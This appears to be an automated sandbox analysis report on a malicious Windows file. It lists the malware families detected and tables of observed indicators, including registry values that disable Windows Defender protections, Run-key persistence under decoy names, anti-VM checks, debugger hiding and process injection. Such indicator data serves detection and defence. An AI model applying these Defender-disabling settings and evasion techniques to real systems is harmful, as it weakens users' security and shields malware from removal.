Analysis Overview
SHA256
06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f
Threat Level: Known bad
The file 06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f was found to be: Known bad.
Malicious Activity Summary
Xworm family
Stealc family
Systembc family
Healer family
LiteHTTP
Healer
Modifies Windows Defender TamperProtection settings
SystemBC
Detects Healer an antivirus disabler dropper
Amadey family
xmrig
Gcleaner family
Litehttp family
Amadey
Modifies Windows Defender DisableAntiSpyware settings
Vidar family
Modifies Windows Defender Real-time Protection settings
Stealc
Detect Xworm Payload
Vidar
Modifies Windows Defender notification settings
Xmrig family
Xworm
Detect Vidar Stealer
GCleaner
XMRig Miner payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Downloads MZ/PE file
Blocklisted process makes network request
.NET Reactor proctector
Drops startup file
Reads user/profile data of web browsers
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Checks BIOS information in registry
Reads user/profile data of local email clients
Identifies Wine through registry keys
Windows security modification
Adds Run key to start application
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Enumerates processes with tasklist
Suspicious use of NtSetInformationThreadHideFromDebugger
AutoIT Executable
Drops file in Windows directory
System Location Discovery: System Language Discovery
Unsigned PE
Browser Information Discovery
Program crash
Enumerates physical storage devices
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Scheduled Task/Job: Scheduled Task
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Modifies system certificate store
Delays execution with timeout.exe
Modifies Internet Explorer settings
Kills process with taskkill
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-05 23:06
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-05 23:06
Reported
2025-03-05 23:09
Platform
win7-20240903-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Amadey
Amadey family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
LiteHTTP
Litehttp family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
Stealc
Stealc family
SystemBC
Systembc family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\sugkcx\gvnsf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\sugkcx\gvnsf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\sugkcx\gvnsf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\ProgramData\sugkcx\gvnsf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\cd0ae9eb0c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\cd0ae9eb0c.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\51a7d2c853.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107710101\\51a7d2c853.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\65ac27f01e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107720101\\65ac27f01e.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\ef30a65d57.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107730101\\ef30a65d57.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\e6410dd2f6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107740101\\e6410dd2f6.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\ipzvs8T3\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE | N/A |
| N/A | N/A | C:\ProgramData\sugkcx\gvnsf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1532 set thread context of 1688 | N/A | C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe | C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe |
| PID 2144 set thread context of 1420 | N/A | C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2508 set thread context of 1572 | N/A | C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 3800 set thread context of 896 | N/A | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe |
| PID 4072 set thread context of 4024 | N/A | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\sugkcx\gvnsf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
